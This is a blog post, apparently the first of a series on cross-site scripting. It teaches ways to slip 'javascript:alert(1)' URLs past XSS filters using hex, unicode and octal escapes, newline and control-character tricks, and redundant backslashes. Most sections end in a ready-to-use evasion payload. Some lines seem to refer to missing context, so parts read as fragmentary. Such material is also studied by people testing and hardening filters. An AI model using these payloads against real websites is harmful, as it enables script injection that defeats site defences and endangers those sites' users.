Xssing Web Part - 1
I'm thinking about sharing everything I know about XSS :) However it's not possible to put all methods in one single post so I would be making several parts of "Xssing Web". Mostly I would be talking about how to bypass XSS filters and how to turn most of non exploitable XSS to exploitable.
In this post I would be talking about how to get XSS in such situations and how to bypass their filters.
It would execute 'alert(1)' function.
Format 1 : \x[HEX]
Format 2 : \u00[HEX]
Do you know we can continue string to newline by ending string with backslash character?? ;)
Bypass : java\[0x0a]script:alert(1)
Here [0x0a] is new line character. You can pass newline character as input by "%0a" in URL.
These are few alternatives to newline character which you can try if newline character is also blocked :
[0x09] <---- Horizontal Tab
[0x0d] <---- Carriage Return
Do you know there are control characters in JS too??
Here are few control characters that we can use to bypass the filter :
\t <---- Horizontal Tab
\n <---- Newline
\r <---- Carriage Return
Bypass : ja\nva\tscript\r:alert(1)
You can use any one or all of this control chars anywhere in string ;)
Note : Sometimes the filter itself converts 0x0a,0x09,0x0d into \n,\t,\r so you can take advantage of that also ;)
Ok do you know escape character??
What happens if we try to escape any character that does not form a control char (\n,\t,\b,\v,\f,\r and of course \x,\u too) ??
The answer is NOTHING.
So we can put escape char in front of any character except n,t,b,v,f,r,x,u and digits.
Bypass : \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
One of my friend @OsandaMalith found one more bypass. [You can read his awesome blog here]
We can encode string in octal as well :
Format 1 : \[OCTAL]
Bypass : \152\141\166\141\163\143\162\151\160\164\072alert(1)
That's enough for today ;)